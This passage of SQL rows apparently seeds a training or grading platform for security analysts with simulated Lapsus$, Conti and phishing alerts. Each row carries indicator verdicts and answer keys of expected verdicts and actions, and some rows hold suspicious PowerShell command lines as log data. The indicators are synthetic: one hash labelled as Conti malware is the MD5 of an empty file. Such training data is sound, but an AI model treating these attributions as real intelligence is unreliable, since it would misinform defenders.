(909, 'Extortion via Demands for Open-Source Drivers', 'high', 'Public forums and social media', 'Lapsus$ has publicly demanded Nvidia to open-source their drivers, leveraging social media to apply pressure. The group has released sensitive internal documents and threatened further leaks if demands are not met.', 'Extortion', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"user\":\"lapsus$member\",\"action\":\"post\",\"platform\":\"Twitter\",\"content\":\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\",\"related_hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\"],\"related_files\":[\"NVIDIA_Internal_Document1.pdf\",\"NVIDIA_Internal_Document2.pdf\"],\"related_email\":\"contact@lapsus$.com\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash related to potentially malicious document.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"contact@lapsus$.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email used for extortion communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(910, 'Public Disclosure and Spectacle Tactics', 'high', 'Press releases and news articles', 'The attacker group has released sensitive data to media outlets, leveraging public spectacle to amplify their demands against Nvidia. This includes press releases and strategically placed news articles aimed at maximizing public attention.', 'Public Disclosure', 'T1585.001 - Establish Accounts: Social Media Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"public_disclosure\",\"source_ip\":\"198.51.100.14\",\"affected_organization\":\"Nvidia\",\"media_outlet\":\"HackerNews\",\"disclosed_data\":[{\"file_name\":\"nvidia_leaked_plans.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"},{\"file_name\":\"confidential_emails.txt\",\"file_hash\":\"7d793037a0760186574b0282f2f435e7\"}],\"user_account\":\"attacker@darkmail.com\",\"disclosure_platform\":\"https://hackernews.com/leaks/nvidia\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber-attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"nvidia_leaked_plans.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"File associated with data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_emails.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized disclosures.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@darkmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Email used in multiple attack campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"https://hackernews.com/leaks/nvidia\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"URL used for public disclosure of sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(911, 'Suspicious Email: Initial Access', 'medium', 'Email Gateway Logs', 'A phishing email was detected attempting to gain initial access to government networks by exploiting vulnerabilities in employee awareness. The email contained a malicious attachment aiming to compromise ministry systems.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"email_subject\":\"Important Update - Payroll Department\",\"sender_email\":\"hr-department@maliciousdomain.com\",\"recipient_email\":\"employee@governmentagency.gov\",\"attachment_name\":\"Payroll_Update_2023.docx\",\"attachment_hash\":\"b6a9c8b37a7d7c8c8d8e9f8b9f8e7d7c\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"malicious_link\":\"http://maliciousdomain.com/update\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"hr-department@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b6a9c8b37a7d7c8c8d8e9f8b9f8e7d7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple AV engines.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in phishing activities.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email: Initial Access\",\"date\":\"2026-02-01T20:32:22.594Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(912, 'Malicious Script Execution Detected', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Once access was obtained, Conti executed malicious scripts to deploy ransomware across critical infrastructure systems.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"85.214.132.117\",\"destination_ip\":\"192.168.1.12\",\"destination_user\":\"jdoe\",\"malicious_file\":\"ransom_deploy.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"execution_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransom_deploy.ps1\",\"process_id\":4321,\"alert_trigger\":\"Suspicious script execution detected by EDR\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"85.214.132.117\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransom_deploy.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script known to deploy Conti ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Conti ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(913, 'Persistence Mechanism Established', 'medium', 'Network Traffic Analysis', 'To ensure continued access, Conti installed backdoors on compromised systems, allowing them to remotely control and further exploit the network.', 'Backdoor Installation', 'T1543.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":\"4444\",\"dst_port\":\"80\",\"action\":\"Established\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_name\":\"Conti_Backdoor\",\"user\":\"jdoe\",\"filename\":\"conti_backdoor.exe\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Conti C2 servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Conti backdoor sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"conti_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_forensics\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable identified as part of Conti toolkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(914, 'Lateral Movement to Multiple Ministries', 'critical', 'Active Directory Logs', 'Conti used stolen credentials to move laterally across the network, encrypting data across multiple ministries and escalating the scale of their attack.', 'Credential Theft', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:35:20Z\",\"event_id\":\"4625\",\"log_name\":\"Security\",\"source_ip\":\"185.123.45.67\",\"user_name\":\"j.doe@government.ministry\",\"target_user\":\"administrator@ministryA.local\",\"target_host\":\"ministryA-server-01\",\"action\":\"Logon Failure\",\"failure_reason\":\"Unknown user name or bad password\",\"hash\":\"bf8e3c7d9b4f5a6c8d7a9b4e3c7d9f8e\",\"file_name\":\"ContiRansomware.exe\",\"internal_ip\":\"192.168.15.23\"}', '2026-01-15 01:02:55', '2026-02-16 17:55:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Conti ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@government.ministry\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"bf8e3c7d9b4f5a6c8d7a9b4e3c7d9f8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Conti ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ContiRansomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Conti ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(915, 'Unauthorized Access Detected on Samsung Network', 'high', 'Network Intrusion Detection System (NIDS)', 'An unauthorized access attempt was detected on Samsung\'s corporate network. Analysis indicates that the Lapsus$ group used stolen credentials from a previous phishing campaign to gain initial access.', 'Initial Access', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T02:14:30Z\",\"event_id\":\"1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"result\":\"failure\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"credentials_source\":\"phishing_campaign\",\"event_description\":\"Failed login attempt detected from external IP using known compromised credentials.\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous intrusions by Lapsus$ group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server used for corporate applications.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account targeted in recent phishing campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(916, 'Malicious Script Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'Detected execution of unauthorized scripts on an endpoint aimed at exploring the network for systems with valuable source code. This activity is indicative of an attacker attempting to broaden their access and control.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:33:25Z\",\"event_id\":\"EDR-456789\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\recon.ps1\",\"parent_process\":\"explorer.exe\"},\"network\":{\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\recon.ps1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":20480},\"malicious_indicator\":{\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT 